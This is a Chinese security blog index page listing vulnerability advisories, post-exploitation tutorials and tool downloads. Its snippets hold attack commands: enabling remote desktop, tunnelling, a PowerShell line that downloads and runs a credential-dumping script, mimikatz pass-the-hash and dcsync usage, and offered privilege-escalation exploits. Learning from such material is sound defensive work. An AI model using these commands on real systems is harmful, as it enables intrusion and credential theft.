爱国小白帽

更好都不行,我只做最好

  • 博客(58)
  • 资源 (28)
  • 论坛 (6)
  • 问答 (1)
  • 收藏
  • 关注

原创 【专题文章导航】本篇收录了SQL注入、漏洞复现、后渗透、新增漏洞报告四个专题的所有文章

SQL注入篇漏洞复现篇新增漏洞报告mysql 联合查询注入文件上传之js绕过【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告对information_schema数据库的解析文件上传之mime绕过【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告盲注iis6.0解析漏洞...

2020-03-07 11:54:33 1002 2

转载 【漏洞通告】Linux Kernel 信息泄漏&权限提升漏洞(CVE-2020-8835)通告

【漏洞通告】Linux Kernel 信息泄漏&权限提升漏洞(CVE-2020-8835)通告原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天通告编号:NS-2020-00212020-03-31TA****G:Linux Kernel、信息泄漏、权限提升、CVE-2020-8835漏洞危害:攻击者利用此漏洞**,可实现...

2020-03-31 21:25:14 1236

转载 CVE-2020-8835: Linux Kernel 信息泄漏/权限提升漏洞通告

CVE-2020-8835: Linux Kernel 信息泄漏/权限提升漏洞通告360-CERT [360CERT](javascript:void(0)???? 今天0x00 漏洞背景2020年03月31日, 360CERT监测发现 ZDI 在 Pwn2Own 比赛上演示的 Linux 内核权限提升漏洞已经被 CVE 收录。CVE编号: CVE-2020-8835。该漏洞由@Manfred...

2020-03-31 16:24:02 1049 4

转载 【更新】本地提权工具公开|CVE-2020-0796:微软发布SMBv3协议“蠕虫级”漏洞补丁通告

【更新】本地提权工具公开|CVE-2020-0796:微软发布SMBv3协议“蠕虫级”漏洞补丁通告360-CERT [360CERT](javascript:void(0)???? 今天0x00 事件描述2020年3月11日,360-CERT监测到有海外厂家发布安全规则通告,通告中描述了一处微软SMBv3协议的内存破坏漏洞,编号CVE-2020-0796,并表示该漏洞无需授权验证即可被远程利用,...

2020-03-31 16:21:46 884 2

转载 【教程】00后小白帽如何用半年时间实现补天众测奖金月入过万

【教程】00后小白帽如何用半年时间实现补天众测奖金月入过万原创 补天平台 补天平台 今天But,做为奇安信的希望当然是喝杯冷萃继续卖命鸭众测审核"局外人"提着一口局气儿为各位师傅分析了一下2019年获得7、8位数奖金的师傅们命令执行漏洞占据了奖金的半壁江山下面就请"局外人"给各位师傅们说一说,唠一唠想在众测里面拿到高额奖金需要重点关注哪些“命令执行” weblogic反序列化...

2020-03-30 20:31:25 814 2

原创 metasploit工具的Windows版安装及使用教程
原力计划

点击下载msfconsole

2020-03-29 15:10:41 3678 12

原创 企业级内网的域控环境搭建3万字详细部署教程
原力计划

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理实验环境:环境搭建:模拟实验:...

2020-03-29 14:21:00 3616 12

转载 通达OA任意文件上传+文件包含GetShell

通达OA任意文件上传+文件包含GetShell原创 li9hu [Timeline Sec](javascript:void(0)???? 昨天本公众号专注于最新漏洞复现,欢迎关注!------------------------------------------------------------------------------------本文作者:li9hu(Timeline Sec复...

2020-03-28 18:34:22 1918 2

原创 【吐血整理】CSDN上各个大厂网络安全岗面试题及个人模拟面试经验精选总结
原力计划

说明:本篇整理的大厂面试题为CSDNAPP中所有安全工程师岗位的题目汇总,还附有本人的几次模拟面试中常见人事问题的见解与思考,可为面试网络安全相关岗位的人提供参考,如有不当之处还请前辈们批评指正,谢谢每一道题都有正确答案,你可以假装看不到先做一遍试试,回头再看一遍小米单选题 正确答案为ACORS的作用是?() A. 允许客户端获取服务器的返回数据 B. 组织客户端发送请求...

2020-03-28 12:46:40 5413 31

原创 记一次灰常灰常艰难的利用永恒之蓝漏洞实现的内网多节点靶场渗透
原力计划

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理资源连接链接:https://pan.baidu.com/s/14kEm-MDzuhct80NGYwZC-w提取码:w0cz渗透目标及工具:目标找到3个flag工具菜刀QuarksPwDump.exekali线索公网IP...

2020-03-27 19:06:31 2797 18

原创 企业级内网环境搭建2万字详细教程
原力计划

简单说明:环境需要四台虚拟机,每一台分别充当企业内不同的功能分区,在真实环境中的配置还需视情况自行更改内网搭建示意图目录指南所需设备:内网环境搭建:pfSense安装及使用说明基本安装过程主机端配置过程浏览器端安装过程测试主机之间的连通情况修改各服务器的IP配置检测网络连通情况设置dhcp为办公区分配IP更改防火墙规则只允许办公区上网设置防火墙规则允许全部机器上网设置防火墙规则使外网能访...

2020-03-25 21:18:40 5962 28

转载 CVE-2017-11882及利用样本分析

CVE-2017-11882及利用样本分析原创 复眼小组 [Gcow安全团队](javascript:void(0)???? 今天CVE-2017-11882及利用样本分析1.本文由复眼小组ERFZE师傅原创2.本文略微偏向基础,首先介绍了该漏洞的成因,并且分析了该漏洞在蔓灵花,摩诃草,响尾蛇APT组织用于实际攻击活动中的详细调试过程3.本文全文字数共2234字,图片95张 预计阅读时间14分钟...

2020-03-25 17:28:04 954

转载 【漏洞通告】微软Type 1字体分析远程执行代码漏洞通告

【漏洞通告】微软Type 1字体分析远程执行代码漏洞通告原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 昨天通告编号:NS-2020-00202020-03-24TAG:**Microsoft、**Type 1字体、远程代码执行漏洞危害:攻击者利用漏洞**,可实现远程代码执行。版本:1.01漏洞概述3月24日,微软...

2020-03-25 11:21:23 1027 4

转载 微软紧急发布Type 1字体解析远程代码执行漏洞通告

微软紧急发布Type 1字体解析远程代码执行漏洞通告360-CERT [360CERT](javascript:void(0)???? 今天0x00 漏洞背景近日,360-CERT监测到微软公司发布了一份编号ADV200006 的紧急漏洞通告,通告表示有在野攻击行动使用了位于Adobe Type Manager Library中的两个远程代码执行0Day漏洞,鉴于漏洞严重,发布该通告指导用户在补...

2020-03-24 08:37:39 1102

转载 Linux命令大全(只有你想不到,没有这里找不到)

Linux命令大全(手册)准确,丰富,稳定,在技术之路上为您护航!查询1:文件管理ls命令 – 显示指定工作目录下的内容及属性信息mkdir命令 – 创建目录cp命令 – 复制文件或目录mv命令 – 移动或改名文件pwd命令 – 显示当前路径2:文档编辑cat命令 – 在终端设备上显示文件内容echo命令 – 输出字符串或提取Shell变量的值rm命令 – 移除文件或...

2020-03-24 08:35:57 464 2

转载 常见Linux系统下载站

Linux系统下载站权威、纯净、稳定,让技术人员放心使用的系统!查询1:RHEL系统Red Hat Enterprise Linux/RHEL 8.0Red Hat Enterprise Linux/RHEL 7.7Red Hat Enterprise Linux/RHEL 7.6Red Hat Enterprise Linux/RHEL 7.5Red Hat Enterpris...

2020-03-24 08:32:59 413

转载 中国程序员最容易读错的单词汇总(带正确发音示范)

中国程序员最容易读错的单词汇总(带正确发音示范)《Linux就该这么学》是一本基于最新Linux系统编写的入门必读书籍,内容面向零基础读者,由浅入深渐进式教学,销量保持国内第一,年销售量预期超过10万本。点此免费在线阅读。日常生产中,当我们需要查阅某个服务的官方文档,或者学习某些最新技术资料时,经常会是英文内容。阅读其实并不困难,或者Google翻译软件就能帮您搞定,但是转述给同事、或者与他人...

2020-03-24 08:24:26 326

转载 weblogic t3 协议利用与防御

weblogic t3 协议利用与防御原创 360-CERT [360CERT](javascript:void(0)???? 4天前报告编号:B6-2020-032001报告来源:360-CERT报告作者:Hu3sky更新日期:2020-03-200x00 前置知识weblogic t3协议指的是weblogic的rmi使用的t3协议,在java rmi中,默认rmi使用的是jrmp协...

2020-03-24 08:23:10 873 4

原创 一个简单的bat脚本便可实现局域网所有存活IP的精准扫描

此脚本的扫描可在几秒钟之内完成脚本内容无需更改,如下:@echo offFOR /L %%I in (1,1,255) do ping 192.168.1.%%I -n 1 -w 100arp -a >C:\Users\Administrator\Desktop\1.txtexit保存后双击执行就会出现1.txt文件,里面会出现所有存活主机的IP...

2020-03-23 23:45:34 1477 1

转载 更新:远程无损扫描工具公开发布| 微软Windows SMBv3服务远程代码执行漏洞(CVE-2020-0796)通告

更新:远程无损扫描工具公开发布| 微软Windows SMBv3服务远程代码执行漏洞(CVE-2020-0796)通告原创 红雨滴团队 [奇安信威胁情报中心](javascript:void(0)???? 今天文档信息编号QiAnXinTI-SV-2020-0008关键字SMB CVE-2020-0796发布日期2020年03月11日更新日期2020年03月2...

2020-03-23 12:06:36 797

原创 window系统命令模式下开启远程桌面服务以及开放3389端口

开启远程桌面服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f开放3389端口netsh advfirewall firewall add rule name="无所谓" dir=in protocol=tcp ...

2020-03-23 11:03:31 1244 1

原创 入侵别人电脑后你必须要会的Linux与window系统用命令行下载网络资源的15种方式
原力计划

我花了一天时间精心整理本文,有百度的经典方案,有老师的精心传授,也有自己的实践总结,如果觉得有用就转发收藏吧❤️别忘点赞哦????这样可以帮助到更多的人????window系统常见下载方式FTP脚本vbs脚本bitsadmin命令$client命令Linux系统常见下载方式wgetcurllynxfetchAxelaria2youtube-dl双方均可用linkslink...

2020-03-22 16:02:05 4052 16

原创 后渗透——内网转发之借助WinRAR软件用命令行打包压缩网站源码
原力计划

WinRAR是一个强大的压缩文件管理工 具。它能备份你的数据,减少你的E-mail附件的大小,解压缩从Internet上下载的RAR、ZIP和其他格式的压缩文件实验环境:例:把D:\webs\目录下的所有东西打包为1.rar放到D:\webs\目录下,以便下载 rar.exe a -k -r -s -m1 D:\webs\1.rar D:\webs 常用压缩命令 rar.ex...

2020-03-22 11:29:14 1230 6

原创 后渗透——内网转发之利用ftp实现文件传输

FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,...

2020-03-21 19:29:05 2443

原创 记一次艰难的多节点YXcms靶场内网渗透
原力计划

Yxcms是一款高效,灵活,实用,免费的企业建站系统,基于PHP和mysql技术,采用MVC三层架构,后台登录账号是admin密码123456下载链接:https://pan.baidu.com/s/1S0FdqGRUSJ2edEp_p-wi9g提取码:77jz文章目录渗透目标及工具:环境安装:渗透过程:1、获取webshell2、找到第一个flag3、找到第二个flag4、找到第三个f...

2020-03-20 17:52:41 2269 4

原创 后渗透——内网转发之利用reGeorg与proxychains在kali中连接远程桌面

reGeorgs是HTTP端的代理工具,它提供了PHP、ASPX、JSP脚本,直接访问显示“Georg says, ‘All seems fine’”,表示脚本运行正常。实验环境:reGeorg-master代理工具Windows Server 2008 R2 x64(192.168.70.128)Windows Server 2003(10.1.1.2)IIS服务器kali...

2020-03-19 18:53:45 1575

转载 Nginx/OpenResty内存泄漏/目录穿越漏洞通告

Nginx/OpenResty内存泄漏/目录穿越漏洞通告原创 360-CERT [360CERT](javascript:void(0)???? 今天0x00 漏洞背景2020年03月18日, 360CERT监测发现 openwall oss-security 邮件组披露了两枚漏洞。在特定配置下 nginx/openresty 存在 内存泄漏漏洞/目录穿越漏洞。Nginx 是异步框架的网页服务...

2020-03-19 17:04:48 2648

原创 后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。反向攻击者ew.exe -s rcsocks -l 1080 -e 8888受害者win2008e...

2020-03-18 22:42:35 877 2

原创 后渗透——内网转发之利用EarthWorm与proxifier搭建正向代理服务器

EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。实验环境:Windows Server 2008 R2 x64(192.168.70.128、10.1...

2020-03-18 21:58:02 837

转载 通达OA远程代码执行漏洞通告

通达OA远程代码执行漏洞通告360-CERT [360CERT](javascript:void(0)???? 今天0x00 漏洞背景2020年03月18日, 360CERT监测发现通达OA官方在03月13日发布了针对勒索病毒事件的紧急更新。根据分析该事件是通达OA中存在的两枚漏洞(文件上传漏洞,文件包含漏洞)所导致。通达OA是由北京通达信科科技有限公司研发的一款通用型OA产品,涵盖了个人事务...

2020-03-18 17:51:09 1154

原创 后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面

Tunna:一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。命令python proxy.py -u http://192.168.70.129/conn.aspx -l 2345 -a 10.1.1.1 -r 3389 -s -v参数含义如下:-l 表示本地监听的端口-r 远程要转发的端口-v 详细模式实验环境:Window...

2020-03-18 17:23:06 576

原创 后渗透——内网转发之利用防火墙规则转发端口实现远程桌面连接

实验环境:Windows Server 2008 R2 x64Windows Server 2003IIS服务器环境搭建:模拟实验:

2020-03-18 15:52:44 513

转载 【漏洞通告】VMware权限提升漏洞(CVE-2020-3950)通告

【漏洞通告】VMware权限提升漏洞(CVE-2020-3950)通告原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天通告编号:NS-2020-00192020-03-18TAG:VMware、权限提升、CVE-2020-3950漏洞危害:攻击者利用此漏洞,可实现权限提升。版本:1.01漏洞概述3月17日,VM...

2020-03-18 15:41:09 478

原创 后渗透——利用nc与reduh在有防火墙的情况下通过网站的80端口连接远程桌面

我们都知道一个端口只能为一个程序服务,如果两个程序用一个端口就会出现端口占用的情况,reduh这个工具就打破了这种规则,它可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。也就是在不用关闭网站的情况下80端口可以两个程序共用实验环境:reDuh-masterWindows Server 2008 R2 x64IIS服务器瑞士军刀nc环境搭建:...

2020-03-17 21:59:55 921

原创 后渗透——利用lcx反弹端口获取内网机器远程桌面

使用场景外网不能访问内网目标机,但是可以访问内网跳板机,目标机3389端口只能本地访问,此时我们要用外网连接目标机的远程桌面如图:实验环境:Windows Server 2008 R2 x64(跳板机)Windows Server 2003(目标机)lcx.exeLcx工具有三个参数功能如下:listen 监听端口tran 将一个端口的流量转发到另一个端口s...

2020-03-17 20:49:48 1274

原创 后渗透——利用kali工具MSF反弹shell

msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。实验环境:Windows Server 2008 R2 x64kali模拟实验:首先输入msfconsole打开软...

2020-03-16 19:42:57 1301

原创 后渗透——权限维持之获取系统管理员administrator密码

什么是权限维持当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的。实验环境:Windows Server 2008 R2 x64SqlServer模拟实验:...

2020-03-16 17:02:20 751

原创 后渗透——内网转发之反弹shell

内网转发目的渗透测试中,我们往往会面对十分复杂的内网环境。比如最常用的防火墙,它会限制特定端口的数据包出入。内网转发三种形式反弹shell在攻击者机器,获取受害者机器的命令行反弹端口受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口 也叫端口转发反弹代理将攻击者的流量,转发到内网其他服务器上实验环境:瑞士军刀ncWindows ...

2020-03-16 12:34:27 2506

转载 jackson-databind-2653: JNDI注入导致远程代码执行漏洞通告

jackson-databind-2653: JNDI注入导致远程代码执行漏洞通告360-CERT [360CERT](javascript:void(0)???? 昨天0x00 漏洞背景2020年3月14日, 360CERT监测到jackson-databind官方发布一则issue,漏洞出现在shiro-core这个packagejackson-databind 是隶属 FasterXML...

2020-03-15 22:04:48 982

转载 【漏洞通告】微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)处置手册

【漏洞通告】微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)处置手册原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 昨天通告编号:NS-2020-0017-12020-03-13TAG:SMBv3、远程代码执行、CVE-2020-0796漏洞等级:高,可导致远程代码执行,易被蠕虫利用传播恶意程序。应急等级:黄...

2020-03-14 09:43:53 1225

冰蝎window版Behinder_v3.0_Beta_6_win .zip

Behinder “冰蝎”动态二进制加密网站管理客户端 功能介绍原文链接: 《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799 工作原理原文链接: 《利用动态二进制加密实现新型一句话木马之Java篇》 https://xz.aliyun.com/t/2744 《利用动态二进制加密实现新型一句话木马之.NET篇》 https://xz.aliyun.com/t/2758 《利用动态二进制加密实现新型一句话木马之PHP篇》 https://xz.aliyun.com/t/2774 运行环境 客户端:jre8+ 服务端:.net

2020-12-25

2020HW工具包.zip

原则文章蓝军HVV实用工具和网站总结(工具已打包) :https://admin-root.blog.csdn.net/article/details/108692522

2020-09-23

upload-labs-master.zip

简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路。 3.实在没有思路时,可以点击查看提示。 4.如果黑盒情况下,实在做不出,可以点击查看源码。

2020-02-13

dedecmsV5.7靶机源码.zip

DedeCMS应用领域 DedeCMS适合应用于以下领域: •企业网站,无论大型还是中小型企业,利用网络传递信息在一定程度上提高了办事的效率,提高企业的竞争力; •政府机关,通过建立政府门户,有利于各种信息和资源的整合,为政府和社会公众之间加强联系和沟通,从而使政府可以更快、更便捷、更有效开展工作; •教育机构,通过网络信息的引入,使得教育机构之间及教育机构内部和教育者之间进行信息传递,全面提升教育类网站的层面; •媒体机构,互联网这种新媒体已经强而有力的冲击了传统媒体,在这个演变过程中,各类媒体机构应对自己核心有一个重新认识和重新发展的过程,建立一个数字技术平台以适应数字化时代的需求; •行

2020-12-25

华军1433mssql数据库弱口令扫描工具

华军1433mssql数据库弱口令扫描工具

2020-03-25

PEiD0.95.zip

PE iDentifier v0.95 (2008.10.21) by snaker, Qwerton, Jibz & xineohP ------------------------------------------------------ PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files. PEiD is special in some aspects when compared to other identifiers already out there! 1. It has a superb GUI and the interface is really intuitive and simple. 2. Detection rates are amongst the best given by any other identifier. 3. Special scanning modes for *advanced* detections of modified and unknown files. 4. Shell integration, Command line support, Always on top and Drag'n'Drop capabilities. 5. Multiple file and directory scanning with recursion. 6. Task viewer and controller. 7. Plugin Interface with plugins like Generic OEP Finder and Krypto ANALyzer. 8. Extra scanning techniques used for even better detections. 9. Heuristic Scanning options. 10. New PE details, Imports, Exports and TLS viewers 11. New built in quick disassembler. 12. New built in hex viewer. 13. External signature interface which can be updated by the user. There are 3 different and unique scanning modes in PEiD. The *Normal Mode* scans the PE files at their Entry Point for all documented signatures. This is what all other identifiers also do. The *Deep Mode* scans the PE file's Entry Point containing section for all the documented signatures. This ensures detection of around 80% of modified and scrambled files. The *Hardcore Mode* does a complete scan of the entire PE file for the documented signatures. You should use this mode as a last option as the small signatures often tend to occur a lot in many files and so erroneous outputs may result. The scanner's inbuilt scanning techniques have error control methods which generally ensure correct outputs even if the last mode is chosen. The first two methods produce almost instantaneous outputs but the last method is a bit slow due to obvious reasons! Command line Options -------------------- PEiD now fully supports commandline parameters. peid -time // Show statistics before quitting peid -r // Recurse through subdirectories peid -nr // Don't scan subdirectories even if its set peid -hard // Scan files in Hardcore Mode peid -deep // Scan files in Deep Mode peid -norm // Scan files in Normal Mode peid <file1> <file2> <dir1> <dir2> You can combine one or more of the parameters. For example. peid -hard -time -r c:\windows\system32 peid -time -deep c:\windows\system32\*.dll Task Viewing / Control Module ----------------------------- You can scan currently running tasks with PEiD. The files are scanned from memory. Processes can also be terminated. You can also optionally dump a module and scan the dumped image. You can also view all dependant modules of the processes. Multiple File Scan Module ------------------------- You can scan multiple files at one go with PEiD. Just drag and drop the files on the PEiD main dialog and the Multiple File Scan Dialog will popup displaying the results. You can keep dragging and dropping files onto this dialog as well. It also offers you to choose from the different scanning modes and optionally load a single file in PEiD. It allows you to skip the non PE files so that the list looks clean. You can also scan the contents of a directory choosing files of custom extension if required. MFS v0.02 now supports recursive directory scanning. Disassembler Module ------------------- You can have a quick disassembly of the file loaded in PEiD. Double click to follow JMPs and CALLs and use the Back button to trace back to the original positions. You can copy disassembled output to the clipboard. A new CADT core with custom String Reference Finder has been cooked up. CADT is coded by Ms-Rem. Hex Viewer Module ------------------- You can have a quick hex view of the file loaded in PEiD. A modified version of 16Edit by y0da is used for this purpose. We intend to update the signatures quite often to keep pace with this ever evolving scene :) Please report bugs, ideas, new signatures or packer info to: pusher -> sir.pusher(at)gmail(dot)com ( Administration / Coder ) snaker -> snaker(at)myrealbox(dot)com Jibz -> peid(at)ibsensoftware(dot)com Qwerton -> qwaci(at)gmx(dot)net ALL SUGGESTIONS, IDEAS, BUG REPORTS AND CRITICS ARE WELCOME. History ------- 0.7 Beta -> First public release. 0.8 Public -> Added support for 40 more packers. OEP finding module. Task viewing/control module. GUI changes. General signature bug fixes. Multiple File and Directory Scanning module. 0.9 Recode -> Completely recoded from scratch. New Plugin Interface which lets you use extra features. Added more than 130 new signatures. Fixed many detections and general bugs. 0.91 Reborn -> Recoded everything again. New faster and better scanning engine. New internal signature system. MFS v0.02 now supports Recursive Scanning. Commandline Parser now updated and more powerful. Detections fi

2020-07-27

Advanced_IP_Scanner IP扫描工具

Advanced_IP_Scanner IP扫描工具

2020-04-03

mimikatz,ms14068

mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : https://github.com/gentilkiwi/mimikatz.git - SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk - ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme - http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a personal development, please respect its philosophy and don't use it for bad things!

2020-04-02

Invoke-WCMDump结合powershell进行密码获取

Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"

2020-03-26

dirtycow脏牛linux提权exp

dirtycow脏牛linux提权exp

2020-03-25

tunna实用工具

tunna实用工具

2020-03-25

hash密码抓取工具大全

hash密码抓取提取密码工具大全

2020-03-25

扫描工具大合集,包括代理、IP、端口、目录等扫描

扫描工具大合集,包括代理、IP、端口、目录等扫描

2020-03-25

CentOS 5.5提权exp

CentOS 5.5提权exp

2020-03-20

内网穿透工具Tunna-master.zip

>Tunna:一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。 > 命令`python proxy.py -u http://192.168.70.129/conn.aspx -l 2345 -a 10.1.1.1 -r 3389 -s -v` 参数含义如下: : -l 表示本地监听的端口 -r 远程要转发的端口 -v 详细模式

2020-03-18

QuarksPwDump_v0.1.zip

先看简介 Quarks PwDump是一个Win32环境下系统授权信息导出工具,目前除此之外还木有没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,(包括xP/2003/Vista/7/2008/8),经测试相当稳定。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。 源地址在这:http://code.google.com/p/quarkspwdump/ 可以导出 : - Local accounts NT/LM hashes + history 本地NT/LM哈希+历史登录记录 - Domain accounts NT/LM hashes + history 域中NT/LM哈希+历史登录记录 - Cached domain password 缓存里的域密码 - Bitlocker recovery information (recovery passwords & key packages) 使用了Bitlocker的恢复信息(恢复密码&关键包) 用法参考说明如下: quarks-pwdump.exe <option(s)> <NTDS file> Options :参数 –dump-hash-local /*Dump出本机HASH*/ -dump-hash-domain-cached /*Dump出域内缓存的Hash*/ -dump-hash-domain (NTDS_FILE must be specified) /*Dump出域内的Hash,NTDS_FILE必须被指定*/ –dump-bitlocker (NTDS_FILE must be specified) /*Dump出BitLocker遗留信息*/ –with-history (optional) -output-type JOHN/LC (optional, if no=>JOHN) /*导出为Lc4或John The Ripper支持的格式*/ –output FILE (optional, if no=>stdout) /*导出结果到文件*/ 木有其他系统 请大家另行测试。 如需导出可以 C:\>quarkspwdump --dump-hash-local --output c:\xxxxx C:\>quarkspwdump --dump-hash-local --output-type LC --output c:\xxxxx

2020-03-16

mof提权文件nullevt.mof

mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp.exe编译执行。

2020-03-12

nc端口监听工具瑞士军刀

